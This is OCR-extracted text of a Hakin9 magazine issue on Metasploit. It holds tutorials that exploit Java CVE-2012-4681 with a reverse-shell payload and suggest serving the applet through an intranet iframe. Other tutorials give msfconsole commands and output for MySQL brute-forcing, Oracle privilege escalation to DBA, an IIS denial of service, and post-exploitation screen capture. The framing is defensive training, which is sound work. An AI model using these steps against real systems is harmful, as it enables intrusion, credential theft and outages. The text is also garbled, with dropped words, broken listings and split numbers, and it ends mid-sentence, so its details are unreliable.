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Dear Readers, 

Metasploit is used to supply its users with information 
concerning security vulnerabilities. It is also helpful while 
you conduct penetration testing. Metasploit Framework, 
which is the main tool used within Metasploit Project, 
serves to develop and execute an exploit code against 
its target. 

This issue is concerned solely with Metasploit. We 
decided to address the topic in response to the rampag- 
ing interest in Metasploit that we observed among our 
readers. 

While reading this publication you will surely notice 
that it was divided into four sections, each addressing 
different issue - Defense Pattern, Hakin9 Extra, Network 
Scanning and Exploring Database. Section number one 
describes Metasploit in the papers of Justin C. Klein Ke- 
ane, Abhinav Singh and Mike Sheward. Second section 
includes the article by Phillip Wylie, whose publication 
is concerned with The Mac OS X Hackers Toolbox. The 
Network Scanning section comprises the articles of Mi- 
chael Boman. Last but not least, the Exploring Database 
section includes an article by George Karpouzas. 

We hope that all the articles found in our magazine 
are not only informative but also helpful and interesting. 



Regards, 

Krzysztof Samborski 
Estera Godlewska 
and Hakin9 Team 
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DEFENSE PATTERN 

How to Use Metasploit for Security 06 
Defense 

BY JUSTIN C. KLEIN KEANE 

If you've ever taken any training about penetration test- 
ing, or read almost any book or online article about the 
trade, you've heard of Metasploit. Years ago, before 
penetration testing was a recognized professional field, 
exploiting a vulnerability was often an extremely oner- 
ous task. Identifying a vulnerability might be as easy 
as fingerprinting a system then searching public mailing 
lists, but finding exploit code was often difficult. 

How to Work with Metasploit Auxiliary 1 2 
Modules 

BY ABHINAV SINGH 

The Metasploit framework is based on a modular ar- 
chitecture. This means that all the exploits, payloads, 
encoders etc. are present in the form of modules. The 
biggest advantage of a modular architecture is that it 
is easier to extend the functionality of the framework 
based on requirement. Any programmer can develop 
his own module and port it easily into the framework. 

How to Explore the IPv6 Attack 22 
Surface with Metasploit 

BY MIKE SHEWARD 

IPv6 is often described as a parallel universe, co- 
existing alongside existing IPv4 infrastructure in a bid to 
ease the transition process. Often left unmanaged and 
unmonitored in networks, those IPv6 packets could pro- 
vide a great opportunity for the savvy attacker. Thanks 
to the Metasploit framework, exploring the IPv6 attack 
surface has become a lot easier. 

HAKIN9 EXTRA 

How to Use The Mac OS X Hackers 30 
Toolbox 

BY PHILLIP WYLIE, CISSP, I AM 
When you think of an operating system to run pen test- 
ing tools on, you probably think of Linux and more spe- 
cifically BackTrack Linux. BackTrack Linux is a great 
option and one of the most common platforms for run- 
ning pen testing tools. If you are a Mac user, then you 
would most likely run a virtual machine of BackTrack 



Linux. While this a great option, sometimes it is nice to 
have your tools running on the native operating system 
of you computer. 

NETWORK SCANNING 

How to Scan with Nessus from within 36 
Metasploit 

BY MICHAEL BOMAN 

When you perform a penetration test with Metasploit 
you sometimes import vulnerability scanning results 
for example Nessus Vulnerability Scanner. Usually you 
start the scan externally from Metasploit framework and 
then import the results into Metasploit. What you can do 
is to manage the Nessus scan from within Metasploit 
and easily import the results into your process. But let's 
start from the beginning. 

How to Use Multiplayer Metasploit with 40 
Armitage 

BY MICHAEL BOMAN 

Metasploit is a very cool tool to use in your penetra- 
tion testing: add Armitage for a really good time. Pen- 
etration test engagements are more and more often a 
collaborative effort with teams of talented security prac- 
titioners rather than a solo effort. Armitage is a script- 
able red team (that is what the offensive security teams 
are called) collaboration tool for Metasploit that visual- 
izes targets, recommends exploits, and exposes the ad- 
vanced post-exploitation features in the framework. 

EXPLORING DATABASE 

How to use Sqlploit 58 

BY GEORGE KARPOUZAS 

Databases nowadays are everywhere, from the small- 
est desktop applications to the largest web sites such 
as Facebook. Critical business information are stored in 
database servers that are often poorly secured. Some- 
one an to this information could a over a company's or 
an organization's infrastructure. 
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How to Use Metasploit 

for Security Defense 

If youVe ever taken any training about penetration testing, or read 
almost any book or online article about the trade, youVe heard of 
Metasploit. Years ago, before penetration testing was a recognized 
professional field, exploiting a vulnerability was often an extremely 
onerous task. 



dentifying a vulnerability might be as easy as 
fingerprinting a system then searching public 
mailing lists, but finding exploit code was often 
difficult. In many cases, researchers would release 
"proof of concept" exploit code that demonstrated 
a vulnerability, but did little more than launch the 
calc.exe program or other harmless activity. Fur- 
thermore, exploit code was often unreliable and 
required specific environments to build and com- 
pile. Thus, a vulnerability tester had to fingerprint 
systems, hunt across the internet and mailing lists 
for exploit code, create systems upon which to 
build and compile the code, then execute the code 
against target systems, and, with fingers crossed 
and baited breath, hope that the exploit worked. 

The situation was frustrating, and untenable for a 
professional class of penetration testers who want- 
ed reliable, easy to access, exploit code to use pro- 
fessionally. Thus, Metasploit was born, as a frame- 
work to support standardized, tested exploit code. 
With Metasploit, exploit code could be packaged in- 
to "modules" in order to ensure they would work with 
the framework. Users of Metasploit only needed to 
ensure that Metasploit itself would run on a system, 
and exploits could be crafted for Metasploit, rather 
than having to rely on a testing lab full of machines 
of various architectures running several different 
operating systems in order to compile exploit code 
successfully. With Metasploit, testers could turn to 
a trusted tool and have confidence that modules in- 
cluded in the framework would work as advertised. 



Metasploit for Defense 

Metasploit has long since become the indus- 
try standard for offensive security and penetra- 
tion testing. It is robust, flexible, and reliable, all of 
which make it a favorite among practitioners. Us- 
ing Metasploit for defensive tasks may seem a little 
counter intuitive. Why would a network security en- 
gineer, say, be interested in an attack tool? There 
are many good answers to these queries. In this 
article I'll propose rather timely example. Recently, 
Oracle's Java implementation was demonstrated 
to have a vulnerability that allowed anyone using 
a web browser to be compromised, remotely, sim- 
ply by viewing a web page (CVE-201 2-4681). This 
vulnerability allowed a maliciously crafted Java ap- 
plet to compromise the Java Virtual Machine (JVM) 
on client machines, and execute arbitrary code as 
the currently logged on user. This was extreme- 
ly damaging, because at the time the vulnerability 
became public, there was no supported fix from 
Oracle (the flaw was a 0-day, that is a vulnerability 
for which no fix exists). This meant that any attack- 
er leveraging the exploit could take over a victim 
machine and there was little defenders could do. 
In short order a Metasploit module was released. 

As expected, there was much wailing and gnash- 
ing of teeth amongst network security defense 
professionals. When new vulnerabilities become 
public the first thing organizations usually want 
to measure is their own level of exposure. With- 
out specific detail it is difficult to justify expense to 
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remediate a problem. For instance, with the Java 
vulnerability, would it be worth the effort to craft in- 
trusion detection alerts so that security staff were 
notified whenever a Java malicious applet was ac- 
cessed, and if so how would one determine how to 
write such a rule. Similarly an organization might 
want to decide if they needed to turn off Java in all 
web browsers, and how that effort would measure 
against the potential risk. 

Knowing the level of exposure and being able to 
concretely address concerns from management 
about a particular risk is an extremely difficult task 
for most defenders. Tools like Metasploit allow de- 
fenders to test exploits against their current sys- 
tem builds and answer these questions. By using 
a tool that allows defenders to actively gauge the 
effectiveness of countermeasures, the likelihood 
of exploit success, and the impact of such an ex- 
ploit can help organizations craft measured, effec- 
tive responses to vulnerability announcements like 
CVE-20 12-4681. 

Getting Started with Metasploit 

Metasploit is a rather large and complex software 
program. It contains a number of tools and can 
be extremely intimidating for a beginner. It is not 
a tool that is inviting to the casual user in order to 
develop familiarity. Rather, operators must under- 
stand Metasploit, its proper use, capabilities, and 
limitations, in order to get maximum value from the 
framework. 

Getting started with Metasploit begins with 
downloading the latest version of the framework 
from Metasploit.com. There are two versions avail- 
able, a free and a commercial version. Metasploit 
was completely free and open source until it was 
acquired by Rapid7, which then began offering a 
commercial version of the tool with extended capa- 
bilities and support. The free version remains the 
flagship, however, so there is no need to fear that 
using the free version will somehow hamper test- 
ing capabilities. The commercial version includes 
extra features for enterprises, so if you plan to use 
Metasploit on any sort of regular basis it is worth 
investigating. 

Architecture 

Metasploit is a complete framework, programmed 
in Ruby. Don't' worry if you don't know how to pro- 
gram, or how to code in Ruby, the framework takes 
care of most of the common tasks most testers 
would be interested in. 

Metasploit includes a number of additional tools 
in addition to the framework itself. You'll notice if 
you look in the install directory that there are com- 



plete versions of Java, Ruby, and PostgreSQL as 
well as Metasploit. These technologies support the 
framework and the various tools that come with 
Metasploit. Most of this should occur behind the 
scenes. 

Installation 

The Metasploit download is fairly straightforward. 
You can install Metasploit on Windows or Linux, or 
even use it in a pre-configured environment such 
as on the BackTrack Linux distribution. For the 
purposes of this article we'll explore installation of 
Metasploit on a Windows XP system as a sort of 
lowest common denominator. However, using the 
tools in Metasploit that require integration with sep- 
arate technologies (such as Java or PostgreSQL) 
may be easier with a preconfigured distribution. 

To get started point a browser at the Metasploit 
website {http://www.metasploit.com), navigate to 
the download section, and choose the version of 
Metasploit that fits your operating system (Figure 1 ). 

Once the download is complete be aware that you 
may get a number of warnings about Metasploit from 
your browser, operating system, and/or anti-virus 
software. Metasploit contains exploit code, by defi- 
nition it is hostile, so your machine is right to identify 
this code as malicious. If you don't get any warnings 
that is likely an indication that your computer's de- 
fenses may need a little attention (Figure 2). 

Open the downloaded installer and run it on your 
machine. You may need to add an exception to your 
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Figure 1. The Metasploit download site 
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Figure 2. Installation warning of exploits 
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anti-virus software to exclude the Metasploit installa- 
tion directory (C:\metasploit) in order for the install to 
complete. Similarly, you may get warnings that your 
machines firewall could interfere with the operation 
of Metasploit. This is mainly due to the fact that ma- 
ny Metasploit payloads require that targets be able 
to connect back to your machine. Careful manipu- 
lation of your firewall to allow these ports is a wiser 
approach than disabling the firewall entirely, but be 
aware that this could cause issues. Once you have 
stepped through any warnings begin the installer. In- 
stallation will require you to accept the license agree- 
ment, decide on an installation directory, choose an 
SSL port on which to serve Metasploit, decide on a 
name for the server and the server's certificate vali- 
dation timespan. In most cases the default options 
for the installation are sufficient (Figure 3). 

Up and Running 

There are several common ways to interact with 
the framework, all included in the install. The first 
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Figure 3. Metasploit installing 



is the console, which you can find under Start -> 
Metasploit -> Metasploit Console. This is the com- 
mand line tool that you use to interact with the 
framework. The other two common ways to con- 
nect are Armitage, which is a Java based GUI tool 
for using Metasploit, MSFGUI, and the Web Ul. 
I have found that the console is by far the most 
direct, efficient, and reliable way to interact with 
Metasploit. In fact, some exploits that seem to 
work perfectly in the console have not functioned 
properly when started from the Web Ul (such as 
the Java CVE-201 2-4681 exploit) (Figure 4). 

Once installed, Metasploit can be utilized in a 
number of ways. The most direct way to interact 
with Metasploit is via the command line, using the 
msfconsole. The console can be intimidating for 
novice users, but it exposes all of the power and 
capabilities of the Metasploit framework, so it is 
worth exploring in order to develop proficiency. 

Getting Started 

Getting started with the Metasploit Console can 
be somewhat perplexing. There is no easy way 
to navigate other than by using text based com- 
mands and some commands are extremely clunky 
(for instance, some commands might produce a 
large volume of output that will flash by the screen, 
but the scroll history of the Console won't let you 
scroll up and actually see all the output). Despite 
these shortcomings, the full power and flexibility 
of Metsaploit is available from the Console, so de- 
veloping proficiency is time well spent. It is worth 
being aware that this may take some investment, 
however, to avoid initial frustration and fatigue with 
the tool. 

Before you get started with the Console it is im- 
portant to make sure that you update Metasploit so 
that you're using the latest version of the framework 
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Figure 4. The Metasploit console 
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with the newest exploits. The installer download- 
ed from the website may not include recently re- 
leased exploit modules. The update program can 
be found under Start -> Metasploit -> Framework 
-> Framework Update. This will open a console 
window and check for the newest version of the 
software (Figure 5). 

Once you're sure your version of the framework 
is up to date you can get started with the Console. 
The first command that you should learn in the 
Console is the 'help' command. This will list out all 
of the commands that you can use in the console. 
There are quite a number of commands. To get 
more information about a command you can type 
'help' followed by the command you're interested 
in (such as 'help banner') (Figure 6). 

To find exploits you'll need to utilize the 'search' 
command. To list all the exploit modules in Metasploit 
you can simply type 'show', but as mentioned be- 
fore, this is of little use since the Console will dis- 
play far too many modules for the interface to actu- 
ally display. Instead, try using the 'search' command 
and searching for Java vulnerabilities by typing 
'search java'. You'll notice that even just searching 
for this one phrase lists quite a number of results. 

When searching for Java modules one also quick- 
ly notices that there are different types of modules 
listed - auxiliary, exploit, and payload. We'll be in- 
terested in the exploit modules in order to craft a 
malicious Java applet, and the payload modules to 
craft our malware payload that will execute when- 
ever a vulnerable machine accesses the applet. To 
search for exploits specific to the vulnerability we 
want to test type 'search cve:201 2-4681'. Alterna- 
tively you can use the Metasploit website to search 
for exploits and find useful descriptions, including 
usage documentation at http://www.metasploit. 
com/modules (Figure 7). 
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Crafting the Exploit 

To begin building our exploit we'll have to tell 
Metasploit which module to use. To do this simply 
type 'use' followed by the name of the exploit (re- 
member, you can type 'help use' to get an example 
of how to execute the 'use' command). In this case 
we'll type in 'use exploit/multi/browser/javaJre17_ 
exec' in order to start using the exploit. You'll notice 
that the Console prompt changes so that you know 
which exploit you're using (Figure 8). 

Now that we're using the desired exploit we have 
to provide instructions for Metasploit to craft our 
malicious payload. So far Metasploit knows we 
want to use the Java 1.7 vulnerability to craft an 
exploit, but once Metasploit takes advantage of the 
vulnerability it needs to understand what instruc- 
tions we want to execute on the victim computer. 
For this example, we will create a payload that 
spawns a reverse shell. A reverse shell is a com- 
mand prompt that we can access locally, but which 
actually executes commands on the target system. 
We can choose a number of payloads that we can 
explore using the 'show payloads' command. 

To select the payload type in 'set PAYLOAD java/ 
shell/reverse_tcp' and hit enter. This will set up a 
payload in the applet that will execute and "shov- 
el" a shell over TCP back to our machine. In order 
for the payload to work we need to tell Metasploit 
the IP address of the machine to connect back to. 
To do this type in 'set LHOST [ip_address]' where 
[ip_address] is the IP of your machine. Once this 
information is entered we're ready to begin. Simply 
type in 'exploit' to start the exploit (which spawns 
a web server listening at a specific URL detailed 
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Figure 7. Using the Metasploit Console search command 
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Figure 6. Metasploit Console help command 



Figure 8. Metasploit Console prompt changes to show the 
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in the Console output that will deliver our payload 
when accessed) (Figure 9). 

Testing the Exploit 

Setting up a test machine may be a little tricky. 
You'll have to ensure that Java is installed on the 
machine, but you need an older, vulnerable ver- 
sion. Older versions of Java are available from Or- 
acle, for testing purposes. You can find older ver- 
sions at http://www.oracle.com/technetwork/java/ 
archive-139210.html or generally looking for Java 
Downloads and then following the link to Previ- 
ous Releases. Using Java 1.7.0_6 should be suf- 
ficient. To determine the version of Java you have 
installed type 'java -version' at the command line. 

In your test machine, pull up a web browser and 
type in the address of the Metasploit server. This is 
a somewhat contrived way to access the malicious 
applet. In the wild, applets such as this are gener- 
ally included in hidden iframe tags that are inserted 
into otherwise innocuous web pages. The exploit 
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Figure 9. Metasploit exploit started 
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Figure 10. Vulnerable machine being exploited via malicious 
Java applet 



can be further hidden by obfuscating the reference 
using JavaScript and functions that encode and 
decode data so that anyone observing the HTML 
source code of an infected web page would see 
nothing but gibberish code that web browsers can 
easily decode and execute but which is more diffi- 
cult for human eyes to parse (Figure 10). 

Calling the URL from your test machine should 
only result in a blank screen (or in this case a warn- 
ing that the Java plugin is out of date, which, kudos 
to Oracle, should nag most users into updating). 
The only indication that the exploit has been suc- 
cessful will appear in the Metasploit Console (Fig- 
ure 11). 

Once you see the indication that the stage has 
been sent you can check to see if a session is avail- 
able. To do this, in the Console, hit enter to get back 
to a prompt. Next, type in 'sessions' to see the ac- 
tive sessions that are available. You should see an 
indication that the reverse shell is up and listening. 
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Figure 1 1 . Metasploit console shows the target has been 
exploited 
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Figure 1 2. Metasploit shows the actively exploited machines 
as sessions 
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Note the £ ld' of the session, as you need this infor- 
mation to connect to the session (Figure 12). 

Once a session is established we can interact 
with the session by typing in 'sessions -i [id]' where 
[id] is the id number noted previously. There are a 
number of session commands that you can explore 
using the 'help sessions' command. As soon as you 
enter interactive mode you'll notice the command 
prompt will change to the familiar MS-DOS prompt 
and you can type commands as though you were 
logged into the target computer (Figure 13). 

Production Use 

Establishing a proof of concept is useful in confirm- 
ing that your Metasploit exploit will actually work. 
Putting it into practice in the wild is the next step. 
You'll want to have Metasploit installed on a ma- 
chine that is accessible in your environment, and 
then start up the exploit so it is serving from the 
server. Next, placing a reference to the Metasploit 
applet in an iFrame on an intranet site or other 
page that you know users in your environment will 
access will allow you to test infection rates. Check- 
ing the console periodically will allow you to see 
IP addresses of users who are vulnerable to the 
exploit. 

A better plan is to simply observe what configura- 
tions fall victim to the Metasploit exploit and what 
configurations do not, then adjust your produc- 
tion systems to protect them. Many antivirus prod- 
ucts will detect the Metasploit payload and stop it, 
which is reassuring in that you can be confident 
that your AV solution will detect Metasploit attacks. 
A better solution is a configuration that denies Java 
from actually attempting to execute the malicious 
applet. For instance, white listing sites upon which 
Java can execute can greatly limit scope. 



Conclusions 

The ability to test exploits against systems in your 
environment is a tremendous advantage. Using 
Metasploit you can easily, and extremely accurate- 
ly gauge your exposure to compromise. The Java 
1.7 vulnerability (CVE-201 2-4681) is just one ex- 
ample. Metasploit includes hundreds of modules, 
including some that will test misconfiguration in ad- 
dition to vulnerabilities. There are modules that will 
perform brute force attacks to do things like test 
the strength of passwords on your SQL servers in 
addition to target enumeration modules that will 
perform ping sweeps, find hosts on your network 
vulnerable to idle scanning, and more. 

Hopefully this brief tutorial has convinced you 
that Metasploit has value to system defenders as 
well as penetration testers. Simulating an attack is 
a great way to expose vulnerabilities in your net- 
works, but it's also a good way to test defensive 
countermeasures. Using a tool like Metasploit, de- 
fenders can test the value of defenses and deploy 
them with confidence. It will also allow defenders 
to speak about the likelihood of specific types of 
attacks penetrating defenses and compromising 
systems. Additionally, using Metasploit, defenders 
can "footprint" attacks and identify patterns that re- 
sult from various classes of attacks, and tune not 
only their prevention countermeasures, but also 
their detection measures (could your network spot 
a reverse shell spawning from one of the internal 
workstations?). For all of these reasons Metasploit 
should definitely be a part of any internal security 
team's toolkit. 
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Justin C. Klein Keane is an information 
security specialist working at the Uni- 
versity of Pennsylvania. Mr. Klein Keane 
holds a Masters degree in Computers and 
Information Technology and is an ac- 
complished security researcher. Mr. Klein 
Keane prefers to work with open source 
technologies and has made numerous contributions 
to the open source community in the form of vulner- 
ability reports, most notably for the open source con- 
tent management system Drupal. Mr. Klein Keane's per- 
forms penetration testing and proof of concept exploi- 
tation frequently and regularly uses Metasploit to accu- 
rately model organizational risk in the face of emerging 
Figure 13. Using Metasploit to type commands on the threats. Mr. Klein Keane writes irregularly for his web- 

exploited target site www.Madlrish.net. 
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How to Work with 

Metasploit Auxiliary Modules 

The Metasploit framework is based on a modular architecture. This 
means that all the exploits, payloads, encoders etc. are present in the 
form of modules. The biggest advantage of a modular architecture 
is that it is easier to extend the functionality of the framework based 
on requirement. 



Any programmer can develop his own mod- 
ule and port it easily into the framework. 
Even though modules are not very much 
talked about while working with metasploit, but 
they form the crux of the framework so it is essen- 
tial to have a deep understanding of it. 

In this tutorial we will particularly focus on / 
framework3/modules directory which contains a 
complete list of useful modules which can ease 
up our task of penetration testing. Later in the 
chapter we will also analyse some of the exist- 
ing modules and finally conclude the discussion 
by learning how to develop our own modules for 
metasploit. So let us start our experiments with 
modules. 

Working with Scanner Modules 

Let us begin our experimentation with scanner 
modules. We will start with scanning modules 
which ships with the framework. Even though 
nmap is a powerful scanning tool but still there can 
be situations where we have to perform a specific 
type of scan like scanning for presence of mysql 
database etc. 

Metasploit provides us a complete list of such 
useful scanners. Let us move ahead and practi- 
cally implement some of them. To find the list of 
available scanners we can browse to /framework3/ 
modules/auxiliary/scanner. 

You can find a collection of more than 35 useful 
scan modules which can be used under various 



penetration testing scenarios. Let us start with a 
basic HTTP scanner. You will see that there are 
lots of different HTTP scan options available. We 
will discuss few of them here. 

Consider the dir scanner script. This will scan 
a single host or a complete range of network to 
look for interesting directory listings that can be 
further explored to gather information. 

To start using an auxiliary module, we will have 
to perform following steps in our msfconsole: 

msf > use auxiliary/scanner/http/dir_scanner 
msf auxiliary (dir_scanner) > show options 

Module options: 

The show options command will list all the 
available optional parameters that you can pass 
along with the scanner module. The most im- 
portant one is the RHOSTS parameter which 
will help us in targeting either a single user or a 
range of hosts. 

Let us discuss a specific scanner module in- 
volving some extra inputs. The mysqi iogin scan- 
ner module is a brute force module which scans 
for the availability of Mysql server on the target 
and tries to login to the database by brute force 
attacking it. 

msf > use auxiliary/scanner/mysql/mysql_login 
msf auxiliary (mysql_login) > show options 
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Module Options (auxilia ry/scanner/mysql/mysql 

_ login): Listing 1. 

AS you can see there are lots of different param- 
eters that we can pass to this module. The better 
we leverage the powers of a module, the greater 
are our chances of successful penetration testing. 
We can provide a complete list of username and 
password which the module can use and try on the 
target machine. Let us provide this information to 
the module. 

msf auxiliary (mysql_login) > set USER_FILE /users. txt 
USER_FILE => /users. txt 

msf auxiliary (mysql_login) > set PASS_FILE /pass. txt 
PASS_FILE => /pass. txt 

Now we are ready to brute force. The last step will 
be selecting the target and provide the run com- 
mand to execute the module (Listing 2). 

The output shows that the module starts the 
process by first looking for the presence of mysql 
server on the target. Once it has figured out, it 
starts trying for the combinations of usernames 
and password provided to it through external text 
file. This is also one of the most widely used mod- 
ular operations of metasploit in current scenario. 



A lot of automated brute force modules have been 
developed to break weak passwords. 

Working With Admin Auxiliary modules 

Moving ahead with our module experiment, we will 
learn about some admin modules which can be re- 
ally handy during penetration testing. The admin 
modules can serve different purposes like it can 
look for an admin panel, or it can try for admin login 
etc. It depends upon the functionality of the mod- 
ule. Here we will look at a simple admin auxiliary 
module called mysql enum module. 

The mysqi enum module is a special utility mod- 
ule for mysql database servers. This module pro- 
vides simple enumeration of mysql databse serv- 
er provided proper credentials are provided to 
connect remotely. Let us understand it in detail 
by using the module. We will start with launching 
the msfconsole and providing the path for auxil- 
iary module. 

msf > use auxiliary/admin/mysql/mysql_enum 
msf auxiliary (mysql_enum) > show options 

Module Options (auxiliary/admin/mysql/mysql _ 
enum)i 



Listing 1. Module options 



Name 


Current 


Setting Required 


Description 


BLANK PASSWORDS 


true 


yes 


Try blank pas . . 


BRUTEFORCE SPEED 


5 


yes 


How fast to . . 


PASSWORD 




no 


A specific password 


PASS_FILE 




no 


File containing. . 


RHOSTS 




yes 


The target address. 


RPORT 


3306 


yes 


The target port. . 


STOP ON SUCCESS 


false 


yes 


Stop guessing... 


THREADS 


1 


yes 


The number of. . 


USERNAME 




no 


A specific user. . 


USERPASS FILE 




no 


File containing. . 


USER_FILE 




no 


File containing. . 


VERBOSE 


true 


yes 


Whether to print. . 


Listing 2. Running a command to execute the module 




msf auxiliary (mysql login 


> set RHOSTS 192.1 


68.56.101 


RHOSTS => 192.168 


.56.101 







msf auxiliary (mysql_login > run 

[*] 192.168.56.101:3306 - Found remote MySQL version 5.0.51a 

[*] 192.168.56.101:3306 Trying username administrator ' with password:'' 
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Name 



Current Setting Required Description 



PASSWORD 
RHOST 

RPORT 3306 
USERNAME 



no The password for the. 

yes The target address 

yes The target port 

no The username to . . 



As you can see that the modules accepts pass- 
word, username and RHOST as parameters. This 
can help the module in first searching for the exis- 
tence of a mysql database and then apply the cre- 
dentials to try for remote login. There are sever- 
al similar modules available for other services like 
MSSQL, Apache etc. The working process is sim- 
ilar for most of the modules. Remember to use 
the show options command in order to make sure 
that you are passing the required parameters to 
the module. 

SQL Injection and DOS attack modules 

Metasploit is friendly for both penetration testers 
as well as hackers. The reason for this is that a 
penetration tester has to think from hacker's per- 
spective in order to secure the network. The SQL 
injection and DOS modules help penetration tes- 
ters in attacking their own services in order to fig- 
ure out if they are susceptible to such attacks. So 
let's discuss some of these modules in detail. The 
SQL injection modules use a known vulnerability 
in the database type to exploit it and provide un- 
authorized access. The modules can be found in 

modules/ auxiliary/ sqli/ oracle. 

Let us analyse an oracle vulnerability called Or- 
acle dbms metadata xml vulnerability. This vulner- 
ability will escalate the privilege from db user to 
DBA (Database Administrator). We will be using 

the dbms_metadata_get_xml module. 
Listing 3. Module options 

Name Current Setting Required Description 



msf auxiliary (dbms_metadata_get_xml) > show 
options 

Module Options (auxiliary/sqli/oracle/dbms _ 
metadata _ get _ xml)! 

Name Current Setting Required Description 



DBPASS TIGER yes 

DBUSER SCOTT yes 

RHOST yes 

RPORT 1521 yes 

SID ORCL yes 

authenticate. 

SQL GRANT DBA to SCOTT no 



The password to. 
The username to. 
The Oracle host. 
The TNS port. 
The sid to 

SQL to execute. 



The module requests for similar parameters which 
we have seen so far. The database first checks 
to login by using the default login credentials ie, 
"SCOTT" and "TIGER" as the default username 
and password respectively. This enables a DB_ 
User level login. Once the modules gains log- 
in as a database user, it then executes the exploit 
to escalate the privilege to the database adminis- 
trator. Let us execute the module as a test run on 
our target. 

msf auxiliary (dbms_metadata_get_xml) > set RHOST 
192.168.56.1 

msf auxiliary (dbms_metadata_get_xml) > set SQL YES 
msf auxiliary (dbms_metadata_get_xml) > run 

On successful execution of module, the user priv- 
ilege will be escalated from db user to db_ 

ADMINISTRATOR. 

The next module we will cover is related to De- 
nial Of Service (DOS) attack. We will analyze a 



RHOST 

RPORT 80 

URI /page. asp 

VHOST 



yes The target address 

yes The target port 

yes URI to request 

no The virtual host name to. 



msf auxiliary (msl0_065_ii6_asp_dos) > set RHOST 192.168.56.1 
RHOST => 192.168.56.1 

msf auxiliary (msl0_065_ii6_asp_dos) > run 
[*] Attacking http : //192 . 168 . 56 . 1 : 80/page . asp 
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simple IIS 6.0 vulnerability which allows the at- 
tacker to crash the server by sending a POST 
request containing more than 40000 request 
parameters. We will analyze the vulnerability 
shortly. This module has been tested on an un- 
patched Windows 2003 server running IIS 6.0. 
The module we will be using is msio_o65_ii6_ 

asp_dos. 

msf > use auxiliary/dos/windows/http/msl0_065_ii6_ 
asp_dos 

msf auxiliary (msl0_065_ii6_asp_dos) > show options 
Module Options (auxilia ry/dos/windows/http/ 

msio _ 065 _ H6 _ asp _ dos): Listing 3. 

Once the module is executed using the run com- 
mand, it will start attacking the target IIS server 
by sending HTTP request on port 80 with URI as 
page. asp. Successful execution of the module 
will lead to complete denial of service of the IIS 
server. 



Listing 4. The Osage ofgetsystem command 



Post Exploitation Modules 

We also have a separate dedicated list of modules 
that can enhance our post-exploitation penetration 
testing experience. Since they are post exploita- 
tion modules so we will need an active session 
with our target. Here we are using an unpatched 
Windows 7 machine as our target with an active 
meterpreter session. 
You can locate the post modules in modules/ 

post/windows/gather. Let US Start With a simple 

enum logged on users module. This post module 
will list the current logged in users in the windows 
machine. 

We will execute the module through our active 
meterpreter session. Also keep in mind to escalate 
the privilege using getsystem command in order 
to avoid any errors during the execution of module 
(Listing 4). 

Successful execution of module shows us two 
tables. The first table reflects the currently logged 
on user and the second table reflects the recently 



meterpreter > getsystem 

...got system {via technigue 4). 

meterpreter > run post/windows/gather/enum_logged_on_users 
[*] Running against session 1 
Current Logged Users 

SID User 

S-l-5-2 1-235028 1388-457 1847 90-4 07 94 15 98 DARKLORD-PC\DARKLORD 



Recently Logged Users 



SID Profile Path 



S-l-5-18 %systemroot%\system32\conf ig\systemprof ile 

S-l-5-19 C: \Windows\ServiceProf ile s\ Local Service 

S-l-5-20 C \Windows\ServiceProf iles\NetworkService 

S-l-5-2 1-23502 C : \Users\DARKLORD 

S-l-5-2 1-235 C: \Users\Winuser 
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meterpreter > run post/windows/gather/screen_spy 
[*] Migrating to explorer.exe pid: 1104 
[*] Migration successful 

[*] Capturing 60 screenshots with a delay of 5 
seconds 



logged on user. Follow the correct path while ex- 
ecuting the modules. We have used the run com- 
mand to execute the modules as they are all in 
form of ruby script so meterpreter can easily iden- 
tify it. 

Let us take one more example. There is an in- 
teresting post module that captures a screen- You might have noticed how easy and useful 
shot of the target desktop. This module can be post modules can be. In the coming future, the 
useful when we have to know whether there is developers of metasploit will be focusing more 
any active user or not. The module we will use is on post modules rather than meterpreter as it 
screen spy.rb. greatly enhances the functionality of penetration 



Listing 5. Pulling out the main scan module from the metasploit library 



def initialize 



super ( 



'Name' => 'TCP Port Scanner', 

'Version' => ' $Revision$ ' , 

'Description' => 'Enumerate open TCP services' , 

'Author' => [ darklord ] , 

'License' => MSF LICENSE 



Listing 6. Module's details 

register_options ( 

[ 

OptString.new( 'PORTS' , [true, "Ports to scan (e.g. 25,80,110-900)", "1-10000"]), 

Optlnt . new ( 'TIMEOUT' , [true, "The socket connect timeout in milliseconds", 1000]), 

Optlnt . new ( 'CONCURRENCY' , [true, "The number of concurrent ports to check per host", 10]), self, 
class) 

deregister_options ( 'RPORT' ) 

Listing 7. Storing of the boolean value in res 



if res 



write_check = send_cmd ( [ 'MKD' , dir] , true 

if (write_check and write_check =~ / A 2/) 
send_cmd( [ 'RMD' , dir] , true) 

Anonymous 
access_type = "rw" 

else 



print_status ("# { target_host } :#{rport} 



print_status ("# { target_host } : #{rport} Anonymous 



access_type="ro" 
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testing. So if you are looking to contribute to the 
metasploit community then you can work on post 
modules. 

Basics of Module Building 

So far we have seen the utility of modules and the 
power that they can add to the framework. In or- 
der to master the framework it is very essential to 
understand the working and building of modules. 
This will help us in quickly extending the frame- 
work according to our needs. In the next few reci- 
pes we will see how we can use ruby scripting 
to build our own modules and import them into 
the framework. To start building our own module 
we will need basic knowledge of ruby scripting. 
In this discussion we will see how we can use 



Listing 8. The result of the operation's failure 



ruby to start building modules for the framework. 
The process is very much similar to meterpret- 
er scripting. The difference lies in using a set of 
pre-defined scripting lines that will be required 
in order to make the framework understand the 
requirements and nature of module. Let us start 
with some of the basics of module building. In or- 
der to make our module readable for the frame- 
work we will have to import msf libraries. 

require 'msf/core' 

This is the first and foremost line of every script. 
This line tells that the module will include all the 
dependencies and functionalities of the metasploit 
framework. 



report_auth_inf o ( 

:host => target_host, 

port => rport, 

sname => 'f tp' , 

user => datastore [ 'FTPUSER' ] , 
: P ass => datastore [ 'FTPPASS' ] , 
:type => "password_# { access_type } ", 
: active => true 

) 

end 

Listing 9. Importing the Framework libraries 

require 'msf/core' 
require 'rex' 

require 'msf /core /post /windows /regis try ' 

class Metasploit3 < Msf:: Post 

include Msf: :Post: : Windows: : Registry 



def initialize (info= {} ) 

super ( update_inf o ( info 



'Name' 

'Description' 
'License' 
'Platform' 
'SessionTypes' 



=> 'Windows Gather Installed Application Enumeration' , 

=> %q{ This module will enumerate all installed applications }, 
=> MSF_LICENSE 
=> [ 'windows' ] , 
=> [ 'meterpreter' ] 



) ) 



end 
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class Metasploit3 < Msf :: Auxiliary 

This line defines the class which inherits the prop- 
erties of the Auxiliary family. The Auxiliary module 
can import several functionalities like scanning, 
opening connections, using databse etc. 

include Msf : : 

The include statement can be used to include a 
particular functionality of the framework into our 
own module. For example, if we are building a 
scanner module then we can include as: 

